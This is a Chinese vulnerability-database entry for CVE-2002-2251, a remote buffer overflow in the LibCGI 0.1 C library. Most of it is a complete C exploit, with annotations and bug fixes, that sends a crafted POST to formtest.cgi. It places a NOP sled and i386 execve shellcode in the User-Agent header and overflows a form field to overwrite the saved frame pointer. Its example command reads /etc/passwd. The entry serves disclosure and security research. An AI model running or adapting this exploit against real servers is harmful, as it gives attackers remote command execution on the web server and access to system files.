Lib CGI Include缓冲区溢出漏洞

Lib CGI Include缓冲区溢出漏洞

漏洞ID 1107117 漏洞类型 缓冲区溢出
发布时间 2002-11-27 更新时间 2002-12-31
CVE编号 CVE-2002-2251
CNNVD-ID CNNVD-200212-482
漏洞平台 Unix CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/22049
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-482
|漏洞详情
Marcos Luiz Onisto 的 LibCGI 0.1 版本中，libcgi.h 内的 changevalue 函数存在缓冲区溢出漏洞：远程攻击者可借助超长的请求参数执行任意代码。下方 EXP 针对示例程序 formtest.cgi，在 User-Agent 头中携带 shellcode，并通过超长的 POST 表单字段（COMMENTS）覆盖保存的帧指针。
|漏洞EXP
source: http://www.securityfocus.com/bid/6264/info

Lib CGI is a freely available, open source CGI library for C programmers. It is available for Unix and Linux operating systems.

A buffer overflow has been reported in the Lib CGI development library: an include file (libcgi.h) performs insufficient bounds checking, so any CGI program that includes it, or that links against a library which does, can be exposed to a remote buffer-overflow attack through oversized request parameters. Successful exploitation gives the attacker code execution with the privileges of the web-server process (the proof of concept below runs as uid 99, `nobody`).

/*
**
** Remote Frame Pointer Overwrite LIB CGI in Language C exploit
**                          by Xpl017Elz in INetCop(c) Security
**
** __
** Proof of concept:
**
** bash$ (./0x82-libCGIfpxpl;cat)|nc 0 80
** HTTP/1.1 200 OK
** Date: Sat, 23 Nov 2002 18:41:14 GMT
** Server: Apache/1.3.26 (Unix) PHP/4.1.2
** Connection: close
** Content-Type: text/html
**
** <html>
** <head>
** <title>LIB CGI in Language C - Testing "libcgi.h" with Url Encoding -
** by Marcos Luiz Onisto , [email protected]</title>
** ...
** 8282828282828282828282828282828282828282828282828282 ...
** ...
**
** Happy Exploit !
**
** Linux testsub 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown
** uid=99(nobody) gid=99(nobody) groups=99(nobody)
**
** __
** exploit by "you dong-h0un"(Xpl017Elz), <[email protected]>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
*/

#include <errno.h>
#include <getopt.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

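#define Xpl017Elz x82
/* Size of the scratch buffers used to assemble the request. */
#define BUFSIZE 1024
/*
 * Default command run by the payload (overridable with -c).  It is handed to
 * `sh -c`, so what the shell sees is:  printf "\n\n\nHappy Exploit !\n\n";uname -a;id
 * The escaped quotes and doubled backslashes are required for that; the
 * rendering of this listing had lost one level of backslashes, which left
 * the literal unterminated.
 */
#define DCOMM "printf \"\\n\\n\\nHappy Exploit !\\n\\n\";uname -a;id"

void banrl(void);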
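/*
 * Default guesses for the two addresses the payload depends on.  Both can be
 * overridden on the command line (-s / -a); the defaults presumably match the
 * author's Linux 2.2 test host named in the header comment.
 */
#define NOPSH 0xbffffc20UL   /* -s: where the NOP sled / shellcode is expected   */
#define SHADR 0xbffffd60UL   /* -a: where the block of NOPSH pointers is expected */

/* Capacity of the command buffer, terminator included. */
#define COMMS 235

/*
 * Longest command the payload can carry.  Every command-relative offset in
 * the shellcode is emitted as a one-byte signed displacement ([esi+disp8]);
 * the largest one is strlen(cmd) + 0x19, which must stay within 0x7f or the
 * stores land in front of the code instead of behind the command string.
 * The original accepted up to COMMS bytes and silently emitted broken code.
 */
#define MAXCMD (0x7f - 0x19)

/* Bytes of NOPSH pointers appended to the User-Agent value. */
#define PTR_BLOCK (BUFSIZE / 4)
/* Bytes of SHADR pointers placed in the COMMENTS form field. */
#define OVERFLOW_LEN 260

/* Length of the execve stub built by build_shellcode(). */
#define SHELLCODE_LEN 67

/*
 * Fill dst[0..nbytes) with v repeated as a little-endian 32-bit word.
 * nbytes must be a multiple of 4.  The target is i386, so the byte order is
 * fixed here instead of being inherited from the host: the original wrote
 * *(long *)&dst[i] in 4-byte steps, which on an LP64 host stores 8 bytes per
 * step and leaves the final word of the pattern zeroed.
 */
static void fill_le32(unsigned char *dst, size_t nbytes, unsigned long v)
{
    size_t i;

    for (i = 0; i + 4 <= nbytes; i += 4) {
        dst[i]     = (unsigned char)(v & 0xffu);
        dst[i + 1] = (unsigned char)((v >> 8) & 0xffu);
        dst[i + 2] = (unsigned char)((v >> 16) & 0xffu);
        dst[i + 3] = (unsigned char)((v >> 24) & 0xffu);
    }
}

/*
 * Parse a 32-bit address given to -s/-a.  Rejects garbage, trailing junk and
 * values wider than 32 bits (the original used strtoul(.., NULL, 0), which
 * turns "xyz" into 0 without a word).  Exits with -1 on a bad value.
 */
static unsigned long parse_addr(const char *s, char opt)
{
    char *end;
    unsigned long v;

    errno = 0;
    v = strtoul(s, &end, 0);
    if (end == s || *end != '\0' || errno == ERANGE || v > 0xffffffffUL) {
        fprintf(stderr, "\n [-] bad address for -%c: %s\n\n", opt, s);
        exit(-1);
    }
    return v;
}

/*
 * Warn when an address contains a 0x00 byte.  This program emits both
 * pointer blocks through "%s", so the repeated pattern is cut short at that
 * byte (and the target's C-string handling would presumably do the same).
 */
static void warn_if_nul(unsigned long v, const char *what)
{
    int shift;

    for (shift = 0; shift < 32; shift += 8) {
        if (((v >> shift) & 0xffu) == 0) {
            fprintf(stderr, " [!] %s 0x%lx contains a NUL byte; the pattern will be truncated\n",
                    what, v);
            return;
        }
    }
}

/*
 * Write the i386 Linux execve("//bin/sh", {"//bin/sh", "-c", cmd, NULL}, NULL)
 * stub into out and return its length (SHELLCODE_LEN).  The stub expects the
 * command to sit directly after its trailing "//bin/sh -c " string, which is
 * why the request prints the command immediately behind these bytes; the
 * offsets that NUL-terminate the command and build argv are patched in from
 * cmdlen.  Caller guarantees cmdlen <= MAXCMD so every offset fits in disp8.
 */
static size_t build_shellcode(unsigned char *out, size_t cmdlen)
{
    static const unsigned char tmpl[SHELLCODE_LEN] = {
        0xeb, 0x30,                     /* jmp  +0x30        -> call below        */
        0x5e,                           /* pop  esi          ; esi = "//bin/sh -c " */
        0x89, 0x76, 0x00,               /* mov  [esi+argv0], esi   ; argv[0]      */
        0x31, 0xc0,                     /* xor  eax, eax                          */
        0x88, 0x46, 0x08,               /* mov  [esi+8], al  ; NUL after "//bin/sh" */
        0x88, 0x46, 0x0b,               /* mov  [esi+11], al ; NUL after "-c"     */
        0x88, 0x46, 0x00,               /* mov  [esi+cmd_end], al  ; NUL after cmd */
        0x89, 0x46, 0x00,               /* mov  [esi+argv3], eax   ; argv[3]=NULL */
        0xb0, 0x0b,                     /* mov  al, 11       ; sys_execve         */
        0x8d, 0x5e, 0x09,               /* lea  ebx, [esi+9] ; "-c"               */
        0x89, 0x5e, 0x00,               /* mov  [esi+argv1], ebx   ; argv[1]      */
        0x8d, 0x5e, 0x0c,               /* lea  ebx, [esi+12]; cmd                */
        0x89, 0x5e, 0x00,               /* mov  [esi+argv2], ebx   ; argv[2]      */
        0x89, 0xf3,                     /* mov  ebx, esi     ; filename           */
        0x8d, 0x4e, 0x00,               /* lea  ecx, [esi+argv0]   ; argv         */
        0x8d, 0x56, 0x00,               /* lea  edx, [esi+argv3]   ; envp (NULL)  */
        0xcd, 0x80,                     /* int  0x80                              */
        0x31, 0xc0,                     /* xor  eax, eax                          */
        0xb0, 0x01,                     /* mov  al, 1        ; sys_exit           */
        0xcd, 0x80,                     /* int  0x80                              */
        0xe8, 0xcb, 0xff, 0xff, 0xff,   /* call -0x35        -> pop esi           */
        '/', '/', 'b', 'i', 'n', '/', 's', 'h', ' ', '-', 'c', ' '
    };
    unsigned char cmd_end = (unsigned char)(cmdlen + 0x0c);  /* terminator of cmd      */
    unsigned char argv0   = (unsigned char)(cmd_end + 0x01); /* argv[0] slot           */
    unsigned char argv1   = (unsigned char)(argv0 + 0x04);   /* argv[1] slot           */
    unsigned char argv2   = (unsigned char)(argv0 + 0x08);   /* argv[2] slot           */
    unsigned char argv3   = (unsigned char)(argv0 + 0x0c);   /* argv[3]/envp: NULL     */

    memcpy(out, tmpl, SHELLCODE_LEN);
    out[5]  = argv0;
    out[16] = cmd_end;
    out[19] = argv3;
    out[27] = argv1;
    out[33] = argv2;
    out[38] = argv0;
    out[41] = argv3;
    return SHELLCODE_LEN;
}

/*
 * Entry point.  Writes one HTTP POST for /cgi-bin/formtest.cgi to stdout; the
 * author's intended use is to pipe it into netcat:
 *
 *     (./0x82-libCGIfpxpl;cat)|nc 0 80
 *
 * The two addresses must be found per target ("Must investigate all
 * shellcode address and &shellcode address" in the original notes):
 *
 *     [nop] [shellcode] [&shellcode]
 *       ^-- -s                ^-- -a
 *
 *     (./0x82-libCGIfpxpl -s 0x82828282 -a 0x8282bab0;cat)|nc 0 80
 *
 * -c replaces the command the payload runs (at most MAXCMD bytes):
 *
 *     (./0x82-libCGIfpxpl -c "echo 'x82 was here.';";cat)|nc 0 80
 *
 * Request layout: the User-Agent value carries NOP sled + shellcode + command
 * followed by PTR_BLOCK bytes of the -s address; the COMMENTS form field
 * carries OVERFLOW_LEN bytes of the -a address.  Per the header comment this
 * is a frame-pointer overwrite: the -a value is what overruns the saved frame
 * pointer and makes it point at the block of -s pointers.  How the User-Agent
 * value reaches the CGI's stack is not visible from this file.
 *
 * Exits 0 after the usage text, -1 on a bad option value or when the body
 * does not fit the scratch buffer.
 */
int main(int argc, char *argv[])
{
    unsigned long nopsh = NOPSH;
    unsigned long shadr = SHADR;
    /* Form fields of the target's formtest.cgi; COMMENTS= is left open so the
     * pointer block becomes its value.  NOTE(review): the EMAIL value reads
     * "[email protected]" on the source page, apparently an e-mail-obfuscation
     * artifact; the original address is not recoverable from here. */
    static const char input_code[] =
        "NAME=Xpl017Elz&[email protected]&HOME=http://x82.inetcop.org&SEL=Music&CHECK=yes&RADIO=very+happy&COMMENTS=";
    static const char send_code[] = "&Submit=Send\n";
    char shc0mm[COMMS] = DCOMM;
    unsigned char x0x[BUFSIZE];
    char x0x2[BUFSIZE];
    size_t cmdlen, sclen, sled, i;
    int whtp, body_len;

    while ((whtp = getopt(argc, argv, "C:c:S:s:A:a:")) != EOF) {
        switch (whtp) {
        case 'C':
        case 'c':
            if (strlen(optarg) > MAXCMD) {
                fprintf(stderr, "\n [-] String Error :-( command is limited to %d bytes\n\n",
                        MAXCMD);
                exit(-1);
            }
            /* snprintf always terminates; the original strncpy left a
             * COMMS-byte command without a NUL. */
            snprintf(shc0mm, sizeof shc0mm, "%s", optarg);
            break;

        case 'S':
        case 's':
            nopsh = parse_addr(optarg, 's');
            break;

        case 'A':
        case 'a':
            shadr = parse_addr(optarg, 'a');
            break;

        case '?':
        default:
            banrl();
            fprintf(stderr, "\n Usage: %s -opt args\n", argv[0]);
            fprintf(stderr, "\n\t-s [addr] - shellcode");
            fprintf(stderr, "\n\t-a [addr] - &shellcode");
            fprintf(stderr, "\n\t-c [cmd]  - command\n");
            /* 0x%lx instead of %p: the values are unsigned long, not pointers. */
            fprintf(stderr, "\n Example: %s -s 0x%lx -a 0x%lx -c 'cat /etc/passwd'\n\n",
                    argv[0], nopsh, shadr);
            exit(0);
        }
    }

    warn_if_nul(nopsh, "-s address");
    warn_if_nul(shadr, "-a address");

    cmdlen = strlen(shc0mm);
    sclen = build_shellcode(x0x, cmdlen);

    fputs("POST /cgi-bin/formtest.cgi HTTP/1.0\n", stdout);
    fputs("Connection: close\n", stdout);
    fputs("User-Agent: ", stdout);

    /* NOP sled padding the first half of BUFSIZE, so -s only has to land
     * somewhere inside it.  Cannot underflow: sclen + MAXCMD < BUFSIZE/2. */
    sled = BUFSIZE / 2 - sclen - cmdlen;
    for (i = 0; i < sled; i++)
        putchar(0x90);
    fwrite(x0x, 1, sclen, stdout);
    fputs(shc0mm, stdout);

    /* PTR_BLOCK bytes of the -s address ("&shellcode"), printed as a string
     * just as the original did. */
    memset(x0x, 0, sizeof x0x);
    fill_le32(x0x, PTR_BLOCK, nopsh);
    printf("%s\n", (char *)x0x);

    fputs("Host: x82 was here.\n", stdout);
    fputs("Content-type: application/x-www-form-urlencoded\n", stdout);

    /* Body: the form with OVERFLOW_LEN bytes of the -a address ("&(&shellcode)")
     * as the COMMENTS value. */
    memset(x0x, 0, sizeof x0x);
    fill_le32(x0x, OVERFLOW_LEN, shadr);
    body_len = snprintf(x0x2, sizeof x0x2, "%s%s%s", input_code, (char *)x0x, send_code);
    if (body_len < 0 || (size_t)body_len >= sizeof x0x2) {
        fprintf(stderr, "\n [-] request body does not fit in %d bytes\n\n", BUFSIZE);
        exit(-1);
    }

    printf("Content-length: %d\n\n", body_len);
    printf("%s\n", x0x2);
    return 0;
}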

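/*
 * Print the tool banner to stdout.  Called from the usage path in main().
 * (The rendering of this listing had dropped the backslashes of the newline
 * escapes, which turned them into literal 'n' characters.)
 */
void banrl(void)
{
    fputs("\n Remote Frame Pointer Overwrite LIB CGI in Language C exploit", stdout);
    fputs("\n                          by Xpl017Elz in INetCop(c) Security\n", stdout);
}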
|参考资料

来源:XF
名称:libcgi-libcgih-changevalue-bo(10715)
链接:http://xforce.iss.net/xforce/xfdb/10715
来源:BID
名称:6264
链接:http://www.securityfocus.com/bid/6264
来源:BUGTRAQ
名称:20021127 Remote Frame Pointer Overwrite vulnerability in LIB CGI in Language C.
链接:http://archives.neohapsis.com/archives/bugtraq/2002-11/0330.html
